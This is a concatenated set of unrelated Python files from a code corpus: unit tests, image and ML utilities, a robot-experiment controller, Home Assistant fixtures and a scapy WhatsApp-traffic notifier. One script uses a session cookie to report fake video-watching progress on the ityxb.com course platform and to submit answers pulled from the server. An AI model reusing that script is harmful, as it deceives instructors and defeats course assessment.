timestamps=test_times, bins=test_bins, histogram=test_histogram) assert plotter._plotfunc == plotter._hist_plot assert (plotter._timestamps == test_times).all() assert (plotter._bins == test_bins).all() assert (plotter._histogram == test_histogram).all() assert plotter._type == 'test plot' def test_invalid_construction(): """Test that instantiation with incorrect arguments raise an exception.""" with pytest.raises(InvalidArgumentsException): plotter = Plotter('test plot', foo=1, bar=1)
StarcoderdataPython
190017
<gh_stars>0 import requests LoginUrl=r'http://stu.ityxb.com/back/bxg_anon/login' InfoUrl=r'http://stu.ityxb.com/back/bxg_anon/user/loginInfo' PointsUrl=r'http://stu.ityxb.com/back/bxg/user/getThreeRedPoints' UnfinshedUrl=r'http://stu.ityxb.com/back/bxg/user/unfinished' PreViewUrl=r'http://stu.ityxb.com/back/bxg/preview/info' PreViewUpdateUrl=r'http://stu.ityxb.com/back/bxg/preview/updateProgress' QuestionRul=r'http://stu.ityxb.com/back/bxg/preview/questions' QuestionsUpdateUrl=r'http://stu.ityxb.com/back/bxg/preview/ansQuestions' QuestionsView=r'http://stu.ityxb.com/back/bxg/preview/viewQuesAnsResult' cookies = "" def _Post(url,data={}): header={ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36', 'cookie' : "JSESSIONID=%s;"%cookies } return requests.post(url,headers=header,data=data).json() def GetInfo(): return _Post(InfoUrl) def GetPoint(): return _Post(PointsUrl)['resultObject'] def GetUnished(): data={ 'pageNumber':'1', 'pageSize':'10', 'type':'1' } return _Post(UnfinshedUrl,data)['resultObject'] def GetPreviemInfo(id): data={ 'previewId':id } return _Post(PreViewUrl,data)['resultObject'] def UpdatePoint(previewId,pointId,s): data={ 'previewId':previewId, 'pointId':pointId, 'watchedDuration':s } return _Post(PreViewUpdateUrl,data) def GetQuestions(previewId,pointId): data={ 'previewId':previewId, 'pointId':pointId, } try: return _Post(QuestionRul,data)['resultObject'][0]['id'] except: return 0 def UpdateQuestions(previewId,pointId,QuestionId,answer): data={ 'previewId':previewId, 'pointId':pointId, 'preivewQuestionId':QuestionId, 'stuAnswer':answer, } a = _Post(QuestionsUpdateUrl,data) return a; def GetAnswer(previewId,pointId): data={ 'previewId':previewId, 'pointId':pointId, } a = _Post(QuestionsView,data) return a['resultObject'][0]['answerOriginal'] def LoginCookies(username,password): data={ 'automaticLogon':'false', 'username':username, 'password':password } info=requests.post(LoginUrl,data) return info.cookies['JSESSIONID']
StarcoderdataPython
1645158
import unittest from unittest.case import TestCase from appClasses import Credentials, User import pyperclip class TestUser(unittest.TestCase): """ Test class defines test cases for the User Class behaviors """ def setUp(self): """ Set up method to run before each test cases """ self.newUser = User("Kenneth", "Mburu", "kentdean", "ankeek80") def tearDown(self): """ tearDown method that does clean up after each test case has been return """ User.usersList=[] def test_init(self): """ test_init case to test if the object is initialized properly """ self.assertEqual(self.newUser.firstname, "Kenneth") self.assertEqual(self.newUser.lastname, "Mburu") self.assertEqual(self.newUser.username, "Kentdean") self.assertEqual(self.newUser.password, "<PASSWORD>") def test_save_new_user(self): self.newUser.save_new_user() self.assertEqual(len(User.usersList),1) def test_save_multiple_users(self): """ test case to test if we can save multiple users in the usersList """ self.newUser.save_new_user() testUser = User("TestFlorence", "TestNjeri", "TestFlonjeri", "TestFlon203") testUser.save_new_user() self.assertEqual(len(User.usersList),2) def test_delete_user(self): """ test case to test if we can remove a user from the usersList """ self.newUser.save_new_user() testUser = User("TestFlorence", "TestNjeri", "TestFlonjeri", "TestFlon203") testUser.save_new_user() self.newUser.delete_user() self.assertEqual(len(User.usersList),1) def test_user_exists(self): """ test to check if we can return a Boolean if we cannot find the contact """ self.newUser.save_new_user() testuser=User("firstname", "lastname", "username", "password") testuser.save_new_user() if_user_exists= User.if_user_exists("username") self.assertTrue(if_user_exists) class TestCredentials(unittest.TestCase): """ Test class defines test cases for the Credentials Class behaviors """ def setUp(self): """ Set up method to run before each test cases """ self.newAccount = Credentials("Instagram", "Widget", "12345") def tearDown(self): """ tearDown method that does clean up after each test case has been return """ Credentials.userAccounts=[] def test_init(self): """ test case to test if the object is initialized properly """ self.assertEqual(self.newAccount.siteName,"Instagram") self.assertEqual(self.newAccount.accountUsername, "Widget") self.assertEqual(self.newAccount.accountPassword, "<PASSWORD>") def test_save_account(self): """ test case to test if the credentials object is saved into userAccounts """ self.newAccount.save_new_userAccount() self.assertEqual(len(Credentials.userAccounts),1) def test_save_multiple_accounts(self): """ test case to test if we can save multiple credentials to userAccounts """ self.newAccount.save_new_userAccount() testaccount = Credentials("Instagram", "Widget", "12345" ) testaccount.save_new_userAccount() self.assertEqual(len(Credentials.userAccounts),2) def test_delete_account(self): """ test case to test if we can remove a credential from our userAccount """ self.newAccount.save_new_userAccount() testaccount = Credentials("Instagram", "Widget", "12345") testaccount.save_new_userAccount() self.newAccount.delete_user_account() self.assertEqual(len(Credentials.userAccounts),1) def test_account_exists(self): ''' test to check if we can return a Boolean if we cannot find the contact. ''' self.newAccount.save_new_userAccount() test_contact = Credentials("Instagram", "Widget", "12345") test_contact.save_new_userAccount() account_exists = Credentials.account_exist("Instagram") self.assertTrue(account_exists) def test_display_all_accounts(self): """ test case to test if a list of all users saved can be returned """ self.assertEqual(Credentials.display_accounts(), Credentials.userAccounts) def test_find_siteName(self): """ test to check if we can find and display an account credential using site name """ self.newAccount.save_new_userAccount() testaccount = Credentials("Instagram", "Widget", "12345") testaccount.save_new_userAccount() foundaccount = Credentials.find_by_siteName("Instagram") self.assertEqual(foundaccount.siteName, testaccount.siteName) # def test_copy_accountUsername(self): # ''' # Test to confirm that we are copying the account username from a found credentials # ''' # self.newAccount.save_new_userAccount() # Credentials.copy_accountUsername("Widget") # self.assertEqual(self.newAccount.accountUsername, pyperclip.paste()) # def test_copy_accountPassword(self): # ''' # Test to confirm that we are copying the account password from a found credentials # ''' # self.newAccount.save_new_userAccount() # Credentials.copy_accountPassword("<PASSWORD>") # self.assertEqual(self.newAccount.accountPassword, pyperclip.paste()) if __name__ == '__main__': (unittest.main())
StarcoderdataPython
3380221
from PIL import Image import numpy as np import math import os path = 'D:/Eye/train_jpg/try/labelme/' newpath = 'D:/Eye/train_jpg/try/labelme/' def toeight(): filelist = os.listdir(path) # 该文件夹下所有的文件(包括文件夹) for file in filelist: if os.path.isdir(file): whole_path = os.path.join(path, file)+'/label.png' img = Image.open(whole_path) # 打开图片img = Image.open(dir)#打开图片 img = np.array(img) # img = Image.fromarray(np.uint8(img / float(math.pow(2, 16) - 1) * 255)) img = Image.fromarray(np.uint8(img)) img.save(newpath + file+'/new_label.png') if __name__=='__main__': toeight() img=Image.open('D:/Eye/train_jpg/try/labelme/') img = Image.fromarray(np.uint8(img)*20)
StarcoderdataPython
1693075
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import time import re import multiprocessing as mp from os import path, makedirs, listdir, remove from shutil import copyfile from threading import Event from psyclab.utilities.osc import OSCResponder, route from psyclab.apparatus.osc_controller import OSCController from psyclab.sl import Robot, robot_user_path from psyclab.sl.data_files import read_sl_data_file, last_data_file, InvalidSLDataFile class Apparatus(OSCResponder): """ Apparatus class used to connect an SL robot model to an experiment controller """ data_file = Event() _controller_class = OSCController def __init__(self, robot_name, configuration='User', host='0.0.0.0', port=7401, **kwargs): OSCResponder.__init__(self, host=host, port=port, **kwargs) # to handle multiple udp clients self._client = {} self.n_data_file = None self.configuration = configuration self.robot_name = robot_name self.controller = None self.robot = Robot(robot_name, user_path=robot_user_path(robot_name, configuration)) def start_robot(self, *args, **kwargs): if self.robot is not None: if self.robot.running: return return self.robot.start(**kwargs) def stop(self, *args): if self.controller: self._client['controller'].send_message('/stop', True) self.controller.terminate() self.robot.stop() OSCResponder.stop(self) def set_task(self, task_name): if not self.running: return self.send('/task', task_name, to='apparatus') @route('/apparatus/connect') def connect_apparatus(self, route, source, *messages): """ Incoming connection request from apparatus """ pid, port = messages host, _ = source self._client['apparatus'] = self.connect(host, port) self.debug(f'apparatus pid:{pid} connecting from {host}:{port}') self.connected_apparatus(pid, host, port) def connected_apparatus(self, *args): """ Connected as client to apparatus callback function """ pid, host, port = args self.send('/apparatus', port, to='apparatus') @route('/sl/data_file') def receive_data_file(self, route, source, n_data_file): host, port = source self.n_data_file = int(n_data_file) self.info(f'data file d{n_data_file:05d} saved; apparatus {host}:{port}') self.data_file.set() self.data_file.clear() @property def user_path(self): """ Active user path for the SL robot model """ if hasattr(self, '_user_path'): return self._user_path return self.robot._user_path @property def last_data(self): """ Index of the current data file from SL data collection """ return last_data_file(self.user_path) def reset_data_index(self): """ Reset the data file index """ try: remove(path.join(self.user_path, '.last_data')) except FileNotFoundError: pass def load_data_file(self, n_data_file, retry=3, pause=0.25): """ Read an SL data file into a metadata header and a dictionary of numpy arrays """ if n_data_file is None: return while retry: # if the data file has not been written (or not fully written), handle exception and retry try: header, data = read_sl_data_file(f'd{n_data_file:05d}') return header, data except (ValueError, FileNotFoundError, InvalidSLDataFile): # self.warning(f'failed to read d{n_data_file:05d}, retrying... ({retry})') time.sleep(pause) retry -= 1 pause *= 2 def remove_data_files(self, archive_path=None, confirm=False): """ Remove all saved data files in the user path; optional archiving """ for data_file in listdir(self.user_path): if not re.match('d\d{5}', data_file): continue if confirm: remove(path.join(self.user_path, data_file)) else: print('rm ' + path.join(self.user_path, data_file)) def archive_data_files(self, archive_path, make_paths=True): """ Archive all data files in the user path """ if make_paths: makedirs(archive_path) for data_file in listdir(self.user_path): if not re.match('d\d{5}', data_file): continue copyfile(data_file, path.join(archive_path, data_file)) def start_controller(self, server_port, client_port, apparatus_host, pid=None): kwargs = { 'robot_name': self.robot_name, 'robot_pid': pid or self._pid, 'apparatus_port': server_port, 'apparatus_host': apparatus_host, 'configuration': self.configuration, 'start': True, } ctx = mp.get_context('spawn') controller = ctx.Process(target=self._controller_class, kwargs=kwargs) controller.start() client = self.connect(apparatus_host, client_port) self.debug(f'started {self._controller_class.__name__}, listening {server_port}, sending {client_port}') return client, controller @route('/controller/connect') def connect_controller(self, route, source, pid, port): host, source_port = source self.debug(f'apparatus pid {pid} controller connecting; {port}:{host}:{source_port}') if self.controller: self.error('new controller not connected - controller already running!') return client, controller = self.start_controller(int(port), int(port) + 1, host, pid=pid) self.controller = controller self._client['controller'] = client
StarcoderdataPython
3214548
<gh_stars>0 # Good morning! Here's your coding interview problem for today. # This problem was asked by Jane Street. # cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns # the first and last element of that pair. For example, car(cons(3, 4)) returns 3, and cdr(cons(3, 4)) returns 4. # Given this implementation of cons: #sit for 30 mins and did it myself def cons(a, b): def pair(f): return f(a, b) return pair Implement car and cdr. #----------------------------------- def cons(a, b): def pair(f): return f(a, b) return pair def car(pair): def get_first(a,b): return a return pair(get_first) def cdr(pair): def get_last(a,b): return b return pair(get_last) print(car(cons(3,4))) print(cdr(cons(3,4)))
StarcoderdataPython
24124
import configparser from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker config = configparser.ConfigParser() config.read('alembic.ini') connection_url = config['alembic']['sqlalchemy.url'] Engine = create_engine(connection_url, connect_args={'check_same_thread': False}) Session = sessionmaker(bind=Engine)
StarcoderdataPython
1613567
from scapy.all import * import time from functools import partial from notifier import notify def print_summary(whatsapp_detected, pkt): if (pkt["IP"].src == "172.16.58.3") or (pkt["IP"].dst == "172.16.58.3"): whatsapp_detected[0] = True def packet_sniff(out_q): while True: time.sleep(0.4) whatsapp_detected = [False] sniff(filter="tcp", prn=partial(print_summary, whatsapp_detected), timeout=0.1, store=0) if whatsapp_detected[0] and out_q.empty(): try: notify("Whatsapp Opened", "Make it quick") except: pass out_q.put(True)
StarcoderdataPython
1708114
<reponame>plscks/CharacterPlanner class SkillAttrib: def __init__(self, skill_name, base_skill, has_child, parent_skill, CP_cost, skill_class, turned_off): self.skill_name = skill_name self.base_skill = base_skill self.parent_skill = parent_skill self.has_child = has_child self.CP_cost = CP_cost self.skill_class = skill_class self.turned_off = turned_off
StarcoderdataPython
3372177
import itertools import random S = " " def main(): # init gophers_count = 100 windmills_count = 18 factors = [17, 13, 11, 7, 5, 3, 2] seed = 1951 a, b, c = [], [], [] random.seed(seed) # generate input data for each night for f in factors: windmills = [f] * windmills_count state = night_check(windmills, gophers_count) calc = sum(state) # a = b + c a.append(calc) b.append(calc // f) c.append(calc % f) print(windmills) print(state) print("%d = %d * %d + %d\n" %(a[-1], f, b[-1], c[-1])) # check k and l from following equations, we search for lowest k and l # f1 * k + a1 = f2 * l + a2, ex.: # 17 * k + a1 = 13 * l + a2 # 13 * k + a1 = 11 * l + a2 ... # later we store results in k array f_range = range(len(factors)) kl = [[0 for i in f_range] for j in f_range] for i, j in itertools.product(f_range, f_range): f1 = factors[i] f2 = factors[j] # a = b + c a1, a2 = a[i], a[j] b1, b2 = b[i], b[j] c1, c2 = c[i], c[j] lowest_common = 0 k = 0 l = 0 while True: g1 = f1 * (k + b1) + c1 g2 = f2 * (l + b2) + c2 lowest_common = max(g1, g2) if g1 == g2: kl[i][j] = str([k, l, lowest_common]) break elif g1 < g2: step = (g2 - g1) // f1 k += max(step, 1) elif g2 < g1: step = (g1 - g2) // f2 l += max(step, 1) if g1 > gophers_count or g2 > gophers_count: print("Error didn't find common") break print_array(kl) def night_check(windmills, gophers_count): result = [0] * len(windmills) for i in range(gophers_count): index = random.randint(0, len(windmills) - 1) result[index] = (result[index] + 1) % windmills[index] return result def print_array(arr): for row in arr: s = S.join([str(elem) for elem in row]) print(s) if __name__ == "__main__": main()
StarcoderdataPython
17090
<reponame>rithvikp1998/ctci ''' If the child is currently on the nth step, then there are three possibilites as to how it reached there: 1. Reached (n-3)th step and hopped 3 steps in one time 2. Reached (n-2)th step and hopped 2 steps in one time 3. Reached (n-1)th step and hopped 2 steps in one time The total number of possibilities is the sum of these 3 ''' def count_possibilities(n, store): if store[n]!=0: return count_possibilities(n-1, store) count_possibilities(n-2, store) count_possibilities(n-3, store) store[n]=store[n-1]+store[n-2]+store[n-3] n=int(input()) store=[0 for i in range(n+1)] # Stores the number of possibilites for every i<n store[0]=0 store[1]=1 store[2]=2 store[3]=4 count_possibilities(n, store) print(store[n])
StarcoderdataPython
1756917
<filename>web/timeline/fields.py import re import datetime class ValidationException(Exception): pass class BaseField(object): def __init__(self, *args, **kwargs): for (k, v) in kwargs.iteritems(): setattr(self, k, v) self.value = getattr(self, 'value', None) self.required = getattr(self, 'required', False) def validate(self): if self.required and self.value is None: raise ValidationException('Error: field is required') class ChoicesField(BaseField): def __init__(self, choices, *args, **kwargs): super(ChoicesField, self).__init__(*args, **kwargs) self.choices = choices self.required = kwargs['required'] if 'required' in kwargs else True def validate(self): super(ChoicesField, self).validate() choices = self.choices if self.required or self.value is not None: while not isinstance(choices, list): if isinstance(choices, dict): choices = flatten(choices.values()) else: raise ValidationException('Error: choices are not iterable') if self.value not in choices: raise ValidationException('Error: %s not a valid choice' % self.value) class StringField(BaseField): def __init__(self, *args, **kwargs): super(StringField, self).__init__(*args, **kwargs) def validate(self): super(StringField, self).validate() value = self.value min_length = getattr(self, 'min_length', None) max_length = getattr(self, 'max_length', None) if value is None and min_length is None: return None elif not isinstance(value, basestring): raise ValidationException('Error: given value is not a string') elif min_length is not None and len(value) < min_length: raise ValidationException('Error: minimum length is %s' % min_length) elif max_length is not None and len(value) > max_length: raise ValidationException('Error: maximum length is %s' % max_length) class NumberField(BaseField): def __init__(self, *args, **kwargs): super(NumberField, self).__init__(*args, **kwargs) def validate(self): super(NumberField, self).validate() value = self.value if value is not None and not isinstance(value, int): raise ValidationException('Error: expected an integer') class DateField(BaseField): def __init__(self, *args, **kwargs): super(DateField, self).__init__(*args, **kwargs) def validate(self): super(DateField, self).validate() value = self.value if value is not None: try: tz_patt = r'[+][0-9][0-9]:[0-9][0-9]Z' m = re.search(tz_patt, value) if m: value = value.replace(m.group(0), '') value = value.replace('Z', '') datetime.datetime.strptime(value, '%Y-%m-%dT%H:%M:%S') except Exception as e: raise ValidationException('Error: Invalid date field: %s' % self.value) def flatten(obj): """ Flattens an object into a list of base values. """ if isinstance(obj, list) or isinstance(obj, dict): l = [] to_flatten = obj if isinstance(obj, list) else obj.values() for sublist in map(flatten, to_flatten): if isinstance(sublist, list): l += flatten(sublist) else: l.append(sublist) return l return obj
StarcoderdataPython
1650850
# -*- coding: utf-8 -*- import json from random import shuffle DIRECTIONS = { "rg": {"dr": +1, "dg": -1, "db": 0}, "rb": {"dr": +1, "dg": 0, "db": -1}, "gb": {"dr": 0, "dg": +1, "db": -1}, "gr": {"dr": -1, "dg": +1, "db": 0}, "br": {"dr": -1, "dg": 0, "db": +1}, "bg": {"dr": 0, "dg": -1, "db": +1} } PLACEHOLDER = '-' class Cube: def __init__(self, r, g, b): self.__coords = {'r': r, 'g': g, 'b': b} self.__letter = PLACEHOLDER self.__links = {} # print('New cube at', str(self)) def __str__(self): return str({ 'coords': self.__coords, 'links': [(dir_label, cube.coords) for dir_label, cube in self.__links.items()] }) # return str(self.r) + ',' + str(self.g) + ',' + str(self.b) @property def coords(self): return self.__coords @property def letter(self): return self.__letter @property def links(self): return self.__links @property def abs_min(self): return min(abs(self.__coords['r']), abs(self.__coords['g']), abs(self.__coords['b'])) @property def abs_max(self): return max(abs(self.__coords['r']), abs(self.__coords['g']), abs(self.__coords['b'])) @property def num_links(self): return len(self.__links) @property def r(self): return self.__coords['r'] @property def g(self): return self.__coords['g'] @property def b(self): return self.__coords['b'] def max_word_length(self, radius): return (radius + 1) + self.abs_max - self.abs_min # def test(self, dir_label, word): # print('test', word, 'to', self.__letter, self.__letter == word[0]) if self.__letter not in (PLACEHOLDER, word[0]): # print(word[0], 'cant fit to', self.__letter) return -1 matches = 0 if len(word) > 1: matches = self.links[dir_label].test(dir_label, word[1:]) if matches == -1: return -1 if self.__letter == word[0]: matches += 1 # print('test of', word, 'to', self.__letter, 'gave', matches, 'matches') return matches def engrave(self, dir_label, word): if len(word) > 1: self.links[dir_label].engrave(dir_label, word[1:]) self.__letter = word[0] def link(self, dir_label, other_cube): self.links.setdefault(dir_label, other_cube) def grow(self, cubes, radius): # print('growing', self, 'minmax', self.abs_min, self.abs_max) for dir_label, direction in DIRECTIONS.items(): # print('testing', dir_label, 'in my links') if dir_label in self.links.keys(): # print('already linked', 'to', dir_label) continue # print('heading at', dir_label) r = self.coords['r'] + direction['dr'] if abs(r) > radius: # print('|__ world is flat X',) continue g = self.coords['g'] + direction['dg'] if abs(g) > radius: # print('|__ world is flat Y',) continue b = self.coords['b'] + direction['db'] if abs(b) > radius: # print('|__ world is flat Z',) continue if (r, g, b) not in cubes: cubes.setdefault((r, g, b), Cube(r, g, b)) next_cube = cubes[(r, g, b)] # print('linking', dir_label, 'with', (x, y, b)) self.link(dir_label=dir_label, other_cube=next_cube) contra_dir_label = dir_label[1] + dir_label[0] next_cube.link(dir_label=contra_dir_label, other_cube=self) if next_cube.num_links == 1: next_cube.grow(cubes, radius) return class Tiling: def __init__(self, radius): self.radius = radius self.size = 3 * (self.radius + 1) ** 2 - 3 * (self.radius + 1) + 1 self.filled_cube_count = 0 self.cubes = {} center_cube = self.cubes.setdefault((0, 0, 0), Cube(0, 0, 0)) center_cube.grow(self.cubes, self.radius) self.empty_cubes = [] for coord in self.cubes.keys(): self.empty_cubes.append(coord) self.words = [] self.letters = {} def __str__(self): coords = [ str(coord) + ': ' + self.cubes[coord].letter for coord in self.cubes ] return json.dumps(coords) @property def tiles(self): return { coord: self.cubes[coord].letter for coord in self.cubes } @property def fill_ratio(self): return self.filled_cube_count / self.size def fillable_word(self): return '' def max_word_length(self, cube, direction=None): if direction: # print(cube, direction) max_r = 2 * self.radius + 1 if direction['dr'] == 0 else abs(direction['dr'] * self.radius - cube.r) + 1 max_g = 2 * self.radius + 1 if direction['dg'] == 0 else abs(direction['dg'] * self.radius - cube.g) + 1 max_b = 2 * self.radius + 1 if direction['db'] == 0 else abs(direction['db'] * self.radius - cube.b) + 1 maxlen = min(max_r, max_g, max_b) # print('maxlen', maxlen) return maxlen else: return (self.radius + 1) + cube.abs_max - cube.abs_min # def engrave_at(self, coord, dir_label, word): cube = self.cubes(coord) matches = cube.test(dir_label, word[0]) if matches > 0: cube.engrave(dir_label, word[0]) # print('Engraved', word[0], 'to', cube.coords, '->', dir_label) self.store(word) self.filled_cube_count += len(word[0]) - matches def engrave(self, word, hint=None): # First word gets just placed on board # next words have to overlap with at least one existing word # print(' trying', word[0]) qualify = False first_word = False if len(self.words) == 0: # print('first word', word[0]) qualify = True first_word = True else: for letter in word[0]: if letter in self.letters: qualify = True if not qualify: # print(' - skipping', word[0], self.letters) return cubes = list(self.cubes.values()) shuffle(cubes) for cube in cubes: if self.max_word_length(cube) < len(word): continue directions = list(DIRECTIONS.items()) shuffle(directions) for dir_label, direction in directions: # print(dir_label) max_word_length = self.max_word_length(cube, direction) if max_word_length < len(word[0]): continue # print('testing', word[0], cube.coords, dir_label) matches = cube.test(dir_label, word[0]) # print('test for', word[0], cube.coords, dir_label, 'resulted', matches, 'matches') if matches > (-1 if first_word else 0): cube.engrave(dir_label, word[0]) # print('Engraved', word[0], 'to', cube.coords, '->', dir_label) self.store(word) self.filled_cube_count += len(word[0]) - matches return def store(self, word): self.words.append(word) for letter in word[0]: self.letters.setdefault(letter, 0) self.letters[letter] += 1
StarcoderdataPython
3217414
from selfdrive.kegman_conf import kegman_conf class AtomConf(): def __init__(self, CP=None): self.kegman = kegman_conf() self.tun_type = 'lqr' self.sR_KPH = [0] # Speed kph self.sR_BPV = [[0,]] self.sR_steerRatioV = [[13.85,]] self.sR_ActuatorDelayV = [[0.1,]] self.sR_pid_KdV = [[1.0,]] self.sR_pid_KiV = [[0.01,]] self.sR_pid_KpV = [[0.15,]] self.sR_pid_deadzone = 0.1 self.sR_lqr_kiV = [[0.01,]] self.sR_lqr_scaleV = [[2000,]] self.cv_KPH = [0.] # Speed kph self.cv_BPV = [[200., 255.]] # CV self.cv_sMaxV = [[384., 255.]] self.cv_sdUPV = [[3,2]] self.cv_sdDNV = [[7,5]] self.steerOffset = 0.0 self.steerRateCost = 0.4 self.steerLimitTimer = 0.8 self.steerActuatorDelay = 0.1 self.cameraOffset = 0.05 self.ap_autoReasume = 1 self.ap_autoScnOffTime = 0 self.learnerParams = 1 self.read_tune() def read_tune(self): conf = self.kegman.read_config() self.learnerParams = conf['learnerParams'] self.ap_autoReasume = conf['ap_autoReasume'] self.ap_autoScnOffTime = conf['ap_autoScnOffTime'] self.tun_type = conf['tun_type'] self.sR_KPH = conf['sR_KPH'] self.sR_BPV = conf['sR_BPV'] self.sR_steerRatioV = conf['sR_steerRatioV'] self.sR_ActuatorDelayV = conf['sR_ActuatorDelayV'] self.sR_pid_KdV = conf['sR_pid_KdV'] self.sR_pid_KiV = conf['sR_pid_KiV'] self.sR_pid_KpV = conf['sR_pid_KpV'] self.sR_pid_deadzone = conf['sR_pid_deadzone'] self.sR_lqr_kiV = conf['sR_lqr_kiV'] self.sR_lqr_scaleV = conf['sR_lqr_scaleV'] self.cv_KPH = conf['cv_KPH'] self.cv_BPV = conf['cv_BPV'] self.cv_sMaxV = conf['cv_sMaxV'] self.cv_sdUPV = conf['cv_sdUPV'] self.cv_sdDNV = conf['cv_sdDNV'] self.steerOffset = conf['steerOffset'] self.steerRateCost = conf['steerRateCost'] self.steerLimitTimer = conf['steerLimitTimer'] self.cameraOffset = conf['cameraOffset']
StarcoderdataPython
1773666
<filename>misc_utils/inference_utils.py import cv2 from tensorflow.keras.models import load_model from tensorflow.keras.preprocessing import image from imageio import imread import numpy as np from matplotlib import pyplot as plt from keras_layers.keras_layer_AnchorBoxes import AnchorBoxes from keras_layers.keras_layer_DecodeDetections import DecodeDetections from keras_layers.keras_layer_L2Normalization import L2Normalization from keras_loss_function.keras_ssd_loss import SSDLoss from ssd_encoder_decoder.ssd_output_decoder import decode_detections def load_det_model(model_path_): ssd_loss = SSDLoss(neg_pos_ratio=3, n_neg_min=0, alpha=1.0) model = load_model(model_path_, custom_objects={'AnchorBoxes': AnchorBoxes, 'L2Normalization': L2Normalization, 'DecodeDetections': DecodeDetections, 'compute_loss': ssd_loss.compute_loss}) return model def do_detections(images_list_, image_base_path_, model_, img_height, img_width): orig_images = [] # Store the images here. resize_images = [] for i in images_list_: img_ = imread(image_base_path_ + i) orig_images.append([img_.shape[0], img_.shape[1]]) img = image.load_img(image_base_path_ + i, target_size=(img_height, img_width)) img = image.img_to_array(img) resize_images.append(img) resize_images = np.array(resize_images) # Do predictions preds = model_.predict(resize_images) # Decode predictions preds_decoded = decode_detections(preds, confidence_thresh=0.5, iou_threshold=0.5, top_k=200, normalize_coords=True, img_height=img_height, img_width=img_width) return preds_decoded, orig_images # def do_detections_multi(image_list_1_,image_list_2_,image_base_path_1_,image_base_path_2_,model_,img_height,img_width): # for i in range(0, len(image_list_1_)): # rgb_img = imre def print_detections(detections_): for d in detections_: np.set_printoptions(precision=2, suppress=True, linewidth=90) print("Predicted boxes:\n") print(' class conf xmin ymin xmax ymax') print(d) def cv_show_detections(detections_, image_list, image_base, class_names, dest_path_): for i, d in enumerate(detections_): image_ = cv2.imread(image_base + image_list[i]) name = image_list[i] for box in d: xmin = box[2] ymin = box[3] xmax = box[4] ymax = box[5] image_ = cv2.rectangle(image_, (xmin, ymin), (xmax, ymax), (0, 255, 0), 1) def cv_show_detection(detections_, image_, color, linewidth, class_names): for detection in detections_: for box in detection: print(box) xmin = int(box[2]) ymin = int(box[3]) xmax = int(box[4]) ymax = int(box[5]) image_ = cv2.rectangle(image_, (xmin, ymin), (xmax, ymax), color, linewidth) return image_ def show_detections(detections_, image_list, image_base, class_names, dest_path_, img_height, img_width): colors = ["#F28544", "#1DFA51", "#EDDC15", "#1E6AC2"] for i, d in enumerate(detections_): plt.figure(figsize=(20, 12)) current_axis = plt.gca() plt.axis(False) image_ = imread(image_base + image_list[i]) name = image_list[i] plt.imshow(image_) for box in d: xmin = box[2] * image_.shape[1] / img_width ymin = box[3] * image_.shape[0] / img_height xmax = box[4] * image_.shape[1] / img_width ymax = box[5] * image_.shape[0] / img_height class_ = int(box[0]) conf = box[1] label = '{}: {:.2f}'.format(class_names[class_], conf) current_axis.add_patch( plt.Rectangle((xmin, ymin), xmax - xmin, ymax - ymin, color=colors[class_], fill=False, linewidth=1)) current_axis.text(xmin, ymin, label, size='x-small', color='white', bbox={'facecolor': colors[class_], 'alpha': 1.0}) plt.savefig(dest_path_ + name, dpi=100, bbox_inches="tight")
StarcoderdataPython
29254
<reponame>duanzhiihao/mycv import os from tqdm import tqdm from pathlib import Path import random from mycv.paths import IMAGENET_DIR from mycv.datasets.imagenet import WNIDS, WNID_TO_IDX def main(): sample(200, 600, 50) def sample(num_cls=200, num_train=600, num_val=50): assert IMAGENET_DIR.is_dir() train_root = IMAGENET_DIR / 'train' # check if imageset file already exist trainlabel_path = IMAGENET_DIR / f'annotations/train{num_cls}_{num_train}.txt' vallabel_path = IMAGENET_DIR / f'annotations/val{num_cls}_{num_train}.txt' if trainlabel_path.exists(): print(f'Warning: {trainlabel_path} already exist. Removing it...') os.remove(trainlabel_path) if vallabel_path.exists(): print(f'Warning: {vallabel_path} already exist. Removing it...') os.remove(vallabel_path) wnid_subset = random.sample(WNIDS, k=num_cls) for cls_idx, wnid in tqdm(enumerate(wnid_subset)): img_dir = train_root / wnid assert img_dir.is_dir() img_names = os.listdir(img_dir) # selelct the num_train and num_val images assert len(img_names) > num_train + num_val imname_subset = random.sample(img_names, num_train + num_val) train_names = imname_subset[:num_train] val_names = imname_subset[num_train:num_train+num_val] # write names to an annotation file with open(trainlabel_path, 'a', newline='\n') as f: for imname in train_names: assert imname.endswith('.JPEG') f.write(f'{wnid}/{imname} {cls_idx}\n') with open(vallabel_path, 'a', newline='\n') as f: for imname in val_names: assert imname.endswith('.JPEG') f.write(f'{wnid}/{imname} {cls_idx}\n') if __name__ == "__main__": main()
StarcoderdataPython
147701
<filename>opsdroid_homeassistant/tests/conftest.py from asyncio import sleep import os import pytest import requests from requests.exceptions import ConnectionError from opsdroid.core import OpsDroid from opsdroid.cli.start import configure_lang @pytest.fixture(scope="session") def docker_compose_file(pytestconfig): return os.path.join( str(pytestconfig.rootdir), "opsdroid_homeassistant", "tests", "docker-compose.yml", ) @pytest.fixture(scope="session") def access_token(): return "<KEY>" @pytest.fixture(scope="session") def homeassistant(docker_ip, docker_services, access_token): """Ensure that Home Assistant is up and responsive.""" def is_responsive(url, headers): try: response = requests.get(url, headers=headers) if response.status_code == 200: return True except ConnectionError: return False port = docker_services.port_for("homeassistant", 8123) url = "http://{}:{}".format(docker_ip, port) docker_services.wait_until_responsive( timeout=30.0, pause=0.1, check=lambda: is_responsive(url, {"Authorization": "Bearer " + access_token}), ) return url @pytest.fixture def connector_config(homeassistant, access_token): return {"token": access_token, "url": homeassistant} @pytest.fixture def connector(connector_config): return HassConnector(config, opsdroid=None) @pytest.fixture def mock_skill_path(): return os.path.join(os.path.dirname(os.path.abspath(__file__)), "mock_skill") @pytest.fixture async def opsdroid(connector_config, mock_skill_path): config = { "connectors": {"homeassistant": connector_config}, "skills": {"test": {"path": mock_skill_path}}, } configure_lang({}) with OpsDroid(config) as opsdroid: await opsdroid.load() await opsdroid.start_connectors() await sleep(0.1) # Give the startup tasks some room to breathe yield opsdroid await opsdroid.stop() await opsdroid.unload() @pytest.fixture async def connector(opsdroid): [connector] = opsdroid.connectors return connector @pytest.fixture async def mock_skill(opsdroid): return opsdroid.mock_skill
StarcoderdataPython
3291141
